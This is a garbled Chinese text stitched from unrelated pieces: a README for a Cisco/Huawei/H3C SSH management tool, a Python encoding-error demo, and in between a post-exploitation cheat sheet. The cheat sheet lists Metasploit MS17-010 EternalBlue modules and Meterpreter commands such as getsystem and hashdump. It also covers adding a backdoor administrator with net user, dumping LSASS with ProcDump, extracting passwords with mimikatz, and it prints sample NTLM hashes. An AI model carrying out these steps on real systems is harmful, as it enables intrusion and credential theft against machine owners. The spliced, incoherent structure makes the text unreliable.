NEM [Network Equipment Manage] 使用指南
cisco、huawei、h3c网络设备管理,类似ansible的用法,支持多线程下发命令,附带其他应用脚本
目前只支持SSH的方式,不支持Telnet, 以后也不会支持telnet,因为不安全
目前只支持SSH的方式,不支持Telnet, 以后也不会支持telnet,因为不安全
欢迎star,fork,提问
#只是一级域名“abc.com” 跳转到www.abc.com去。Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::
每个字段的含义: 用户名:唯一安全ID:LM_HASH :NTLM_HASH
这串值就是LM_HASH,通过google “lm hash crack” 尝试破解
01FC5A6BE7BC6929AAD3B435B51404EE
0x02 Meterpreter 命令行工具
通过google搜索 “Metasploit工具Meterpreter的命令速查表”对反弹shell进行利用
其中比较常用的命令:
getuid 查看当前用户
getsystem 获取系统权限
shell 打开shell或者cmd
run hashdump 把sam数据库dump
0x03 常用payloaduse windows/meterpreter/reverse_tcpuse auxiliary/scanner/smb/pipe_auditorms17-010 payload:use exploit/windows/smb/ms17_010_eternalblueuse exploit/windows/smb/ms17_010_psexec0x04 ms17-010漏洞利用使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程MSF下ms17_010_psexec模块使用技巧Meterpreter提权详解
0x05 windows修改用户密码技巧因为中文的windwos系统,在Meterpreter 会显示乱码,在进行net user操作出现报错比如 NET HELPMSG 2245 表示密码长度不够规格,不够复杂比如 NET HELPMSG 3783 表示没有这个组或者用户net user administrator abc123 //修改administrator的密码net user test v5est0r /add //增加新用户 net localgroup administrators test /add //并且加入管理员组
0x06 获取system权限,对管理员密码获取利用Meterpreter upload 上传 ProcDump 对系统的LSASS进程内存文件导出,命令如下Procdump.exe -accepteula -ma lsass.exe lsass.dmp导出后,利用Meterpreter download 将 lsass.dmp 文件下载到本地最后运行mimikatz,进行破解mimikatz # sekurlsa::minidump lsass.dmpmimikatz # sekurlsa::logonPasswords fullMeterpreter 加载mimikatz直接进行破解load mimikatz
help mimikatz
mimikatz_command -f privilege::debug mimikatz_command -f privilege::security mimikatz_command -f sekurlsa::logonPasswords
UnicodeDecodeError: 'utf8' codec can't decode byte 0xb5 in position 2: invalid start byte
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb5 in position 2: ordinal not in range(128)
通过下面代码,制造错误
>>> a='as的'
>>> print a
as的
>>> print a.decode('utf-8')
>>> print a.decode('ascii')
>>> print a.decode('gbk')
>>> print a.decode('gb2312')
>>> print a.decode('cp936')
-